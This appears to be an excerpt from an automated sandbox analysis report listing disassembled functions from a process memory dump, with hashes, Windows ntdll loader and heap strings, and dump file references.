                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              • Opcode ID: 0ee4e231ec806bc9bb963d2c6407b40250e6aa543de4b756ca7a91712e984854
                                                              • Instruction ID: d3d2f428b0bde6f2d0b6336eb4a99571ab7df2e6bd570e770747d6c23671627e
                                                              • Opcode Fuzzy Hash: 0ee4e231ec806bc9bb963d2c6407b40250e6aa543de4b756ca7a91712e984854
                                                              • Instruction Fuzzy Hash: 1F718B709097429FC708CF94CD80A0BBBEABF85618F204A1FF99967291D771A925CF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202315F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 2027A589
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 2027A59A
                                                              • LdrpCompleteMapModule, xrefs: 2027A590
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: 5e6ffa37eed0dff3a015b793699bf5cf98bf4b5c5ba6bfad8cf7cad098ac2b80
                                                              • Instruction ID: f331e1f399ec82fe4470d373b7e926a252ce2be5fb38de3842d84caa5804f3bf
                                                              • Opcode Fuzzy Hash: 5e6ffa37eed0dff3a015b793699bf5cf98bf4b5c5ba6bfad8cf7cad098ac2b80
                                                              • Instruction Fuzzy Hash: A451C1B0A007569BD711CFD8CD82B0677E8BB40724F19455BFA519B6E2D778ED608F40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                              • API String ID: 0-1151232445
                                                              • Opcode ID: b020ba4f8ba669d2307d8de96be18bfbd40d5b0d26b672a01790aa506b91c733
                                                              • Instruction ID: 0e65aaccf1dd9a7b394aeaf6c1e95f90dac4fed9a6e0a57d78a1063b94d950a6
                                                              • Opcode Fuzzy Hash: b020ba4f8ba669d2307d8de96be18bfbd40d5b0d26b672a01790aa506b91c733
                                                              • Instruction Fuzzy Hash: 27412370A00B428FDB158FD8CC80BA977EAAF11244F2444ABD6468BA46D637D9E5CF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 202CC1C5
                                                              • PreferredUILanguages, xrefs: 202CC212
                                                              • @, xrefs: 202CC1F1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 26ced62032193ec6dfda5f9f1bbe46c8b18ee30ee868465c7f67dc3c85b7e32c
                                                              • Instruction ID: 17c44ee5dc8d4836c7c7e9220e419538ff2b51b692b642f5b6af4e875303ca0c
                                                              • Opcode Fuzzy Hash: 26ced62032193ec6dfda5f9f1bbe46c8b18ee30ee868465c7f67dc3c85b7e32c
                                                              • Instruction Fuzzy Hash: D1417F72E1021AABDB10CFE4CC91FDEB7B8AB14714F21416BEA05B7290D774AE54CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 0abf6eac482aeb2707999047fde3eb0c46e49b30c879e95e113d76ebadffb8a6
                                                              • Instruction ID: c27bf8a1e64a4afd0d707dee1ee8aaf75d7ce371976d437b108708277fd3e0cc
                                                              • Opcode Fuzzy Hash: 0abf6eac482aeb2707999047fde3eb0c46e49b30c879e95e113d76ebadffb8a6
                                                              • Instruction Fuzzy Hash: 8041DC319006598BEB11CFE4DD80B9DBBB8FF95340F20046BED05AB782DA74EA61CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202433A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context data, xrefs: 202829FE
                                                              • RtlCreateActivationContext, xrefs: 202829F9
                                                              • Actx , xrefs: 202433AC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              • API String ID: 0-859632880
                                                              • Opcode ID: 6646a2dc8987c0da8cbc7ae0c6f327fe026290456f56873bdd87e86ddb3aed6a
                                                              • Instruction ID: a7628f6f7650f664a4cf81637e6542fbac1541025512c6c772cd6a2f11ced4a4
                                                              • Opcode Fuzzy Hash: 6646a2dc8987c0da8cbc7ae0c6f327fe026290456f56873bdd87e86ddb3aed6a
                                                              • Instruction Fuzzy Hash: 2431DF36A112169BDB1ACEA4ECC0B9637A4FF44710F21446AEA049F286C734ED65CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2029B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2029B632
                                                              • GlobalFlag, xrefs: 2029B68F
                                                              • @, xrefs: 2029B670
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                              • API String ID: 0-4192008846
                                                              • Opcode ID: 6e67e6fec15a5dc31c9e7dd97e5515d5b86d0e93017500ccdec3be7cd8433188
                                                              • Instruction ID: 8aee6951480ba728f02ebe1b11f50f7f118e2dc81b00c2ab386a76b4a0c1e0f2
                                                              • Opcode Fuzzy Hash: 6e67e6fec15a5dc31c9e7dd97e5515d5b86d0e93017500ccdec3be7cd8433188
                                                              • Instruction Fuzzy Hash: 9B3139B1A0021DAFDB05DFD4CD81BEEBBBCEB48744F10046AE605A6190D774AE548BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20292104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 202920F3
                                                              • LdrpInitializationFailure, xrefs: 202920FA
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 8864348d00cd0148bdf67f512622b26b8e8357491eac4996d1c0072253e22f5d
                                                              • Instruction ID: ab47c6fab622a0990ce317a7a4de019cfa5cc5c00dc36e5f1c868a522540334b
                                                              • Opcode Fuzzy Hash: 8864348d00cd0148bdf67f512622b26b8e8357491eac4996d1c0072253e22f5d
                                                              • Instruction Fuzzy Hash: 36F0C87150160CAFD714DBC8CC86F9937ADFB40B98F51005AF60477286D2B0AA64CA91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: d262a68675ccc05524a7edc3cd78129bcc6938264b16a488c3a7ec1d432ca8ff
                                                              • Instruction ID: d30aa21e272728cc7340f921387e9222fe5851df7f1746f1265606546f7a1d46
                                                              • Opcode Fuzzy Hash: d262a68675ccc05524a7edc3cd78129bcc6938264b16a488c3a7ec1d432ca8ff
                                                              • Instruction Fuzzy Hash: 9B714971A0054A9FCB05CFE8DD95FAEB7B8BF08304F144066E904A7251EB38AE61CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202252A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: b0f16e6af52b569b4d20dce772288014aa84ba036af661e02683d879caec1005
                                                              • Instruction ID: 27d484e0c97e512ef7a2189391cbb912e063db42fce3891bd84225618ea787b5
                                                              • Opcode Fuzzy Hash: b0f16e6af52b569b4d20dce772288014aa84ba036af661e02683d879caec1005
                                                              • Instruction Fuzzy Hash: 38328B705087228FC7248F94D8A4B7AB7F9AF84740F50891FF9859B2A0E774DDA4CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: 3eeb1e80ff3d7dc3d21a3840ef3fb967e5160ab854b24b5ebf3bde35ea53f795
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 44C1CF322043429BEB14CFA4CC41F5BBBE5BF84754F144A2EF6958A290D774ED29CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 20210540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2021063D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 3d7ed9ed35c78afa5f66b0acf12d86ce2d9ad2ba2a1b6b51e022f86fa5cfcd76
                                                              • Instruction ID: 8b0a6a1eac61786cd2fc946cb743d8afe6e64776f0a5a668de528ce0f24d34a3
                                                              • Opcode Fuzzy Hash: 3d7ed9ed35c78afa5f66b0acf12d86ce2d9ad2ba2a1b6b51e022f86fa5cfcd76
                                                              • Instruction Fuzzy Hash: E751AE715047869BC314DFA4C980697F7E9BF84304F00483FE6A997242E7B4AAA5CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2021A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 2021A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 2021A2FB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 2e0013890a783de78a310e017241f665fb9a960ec59f85240428005f80c44cd6
                                                              • Instruction ID: c30fb64e9f33fa940d18df4fe294f8d8751a32e7ab918950192bdb76c02c7110
                                                              • Opcode Fuzzy Hash: 2e0013890a783de78a310e017241f665fb9a960ec59f85240428005f80c44cd6
                                                              • Instruction Fuzzy Hash: BA418071A0465ADBDB01CFD9CC80B59B7F4FF45704F2080A6E914DB2A2E375DAA0CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202A35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                              • API String ID: 0-118005554
                                                              • Opcode ID: 687e61b48331819bfe2e92827181ffd4d957b0ab7e66ededf5d3dee064dc61cd
                                                              • Instruction ID: 76b4e031b3f88d63e99028ca1622e5f1f77ce142ca77cd6f70b0f154d7d7bd4d
                                                              • Opcode Fuzzy Hash: 687e61b48331819bfe2e92827181ffd4d957b0ab7e66ededf5d3dee064dc61cd
                                                              • Instruction Fuzzy Hash: 5431E131209742AFD301CFA4DE85B1AB7E8EF84B50F10086AF9548B391EB74D915CB9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              • Opcode ID: c7477c27ac04ffd78a0a3e2b0ac0db30f54272efa01c441bf72644468da5444a
                                                              • Instruction ID: bb07a0e1a46489eff033539f1e8ecc042b4545953e3ab28930c130f636b98228
                                                              • Opcode Fuzzy Hash: c7477c27ac04ffd78a0a3e2b0ac0db30f54272efa01c441bf72644468da5444a
                                                              • Instruction Fuzzy Hash: DC31AE729087059FC315CFA8DE81A5BBFE8EB84654F50096FF99483250DA34ED289BD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202434B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 20282A90
                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 20282A95
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                              • API String ID: 0-2653619699
                                                              • Opcode ID: bf2eb7d1e1aa17c61b4e398dc8e7228d30246bd0cf65b6bd49032ba4a7289f82
                                                              • Instruction ID: 1a43fa523467a59498e38cd014a3738b7f0247b45fa8404d0d3439ace3143cf2
                                                              • Opcode Fuzzy Hash: bf2eb7d1e1aa17c61b4e398dc8e7228d30246bd0cf65b6bd49032ba4a7289f82
                                                              • Instruction Fuzzy Hash: 98115C71F00205ABE7198EC89E81FAB72A99F94B04F25802BBA00DB280D674CE1086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 2505608853e4381b5d926cedc10d2b05701ca36dbf99c456d803ad389720b3a4
                                                              • Instruction ID: 86632d1932bf38097df730435b2d16c0c4377e0623d6c0fd4bacf07a581ffcad
                                                              • Opcode Fuzzy Hash: 2505608853e4381b5d926cedc10d2b05701ca36dbf99c456d803ad389720b3a4
                                                              • Instruction Fuzzy Hash: 47012CB2504A04AFE312CFA4CD45F1677ECE740B19F06883AB208C7194E338E814EB4A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @[0 @[0
                                                              • API String ID: 0-3070428983
                                                              • Opcode ID: c294e7844104195c91305e354c5a8211b5aad3956fc8e748cf349701af0291b9
                                                              • Instruction ID: 067703223ad985c95116243c3007e2906775b733a8d1d30601bef9ed52d0dd0e
                                                              • Opcode Fuzzy Hash: c294e7844104195c91305e354c5a8211b5aad3956fc8e748cf349701af0291b9
                                                              • Instruction Fuzzy Hash: C4329EB2E01219DBCF15DF98CC91BAEBBB5FF54714F14002AEA05AB391E7359921CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20217370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81bf03fa3b60ce59c06b89b8b4844ea0cdef7c3cf0ebae68c34d15adfabe3399
                                                              • Instruction ID: 8e3a4bb6fb222b35c31c7e24c7c3c6fbd9098d3648cb7b81b6e0a520d29749f7
                                                              • Opcode Fuzzy Hash: 81bf03fa3b60ce59c06b89b8b4844ea0cdef7c3cf0ebae68c34d15adfabe3399
                                                              • Instruction Fuzzy Hash: 48A138716087429FD314CFA8C880A1AFBF6BF98204F20496EF58597356E734E995CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2022E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 07bfe23f71b264634608180a482e269497722dd596c7f62acfd4a73cbfcd4fa5
                                                              • Instruction ID: bbdadca830ea17acf01893cb4e99d4295530d30ccb1aa47ebf4f38f4bad15cd1
                                                              • Opcode Fuzzy Hash: 07bfe23f71b264634608180a482e269497722dd596c7f62acfd4a73cbfcd4fa5
                                                              • Instruction Fuzzy Hash: A1418E725097129FDB10CFE1AC81B6BB7E8AF98714F44092BF984E7140E674DA149B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
